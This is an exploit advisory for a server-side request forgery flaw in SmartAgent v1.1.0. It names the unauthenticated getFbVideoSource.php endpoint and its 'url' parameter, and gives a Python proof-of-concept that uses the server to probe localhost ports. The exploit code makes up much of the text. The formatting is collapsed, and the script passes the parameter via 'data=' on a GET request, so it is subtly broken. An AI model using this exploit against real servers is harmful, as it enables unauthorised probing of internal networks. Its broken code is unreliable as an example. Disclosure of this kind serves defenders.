Headline
SmartAgent 1.1.0 Server-Side Request Forgery
SmartAgent version 1.1.0 suffers from a server-side request forgery vulnerability.
# Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.The GET request includes the vulnerable parameter "url".Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smartagent.[client].com/FB/getFbVideoSource.php"port = input("Enter the port you want to check: ")parameter = { "url": "http://127.0.0.1:" + port}response = requests.get(url, data=parameter, verify=False)if response.status_code == 200: print(f"Port {port} is open on the server")else: print(f"Port {port} closed")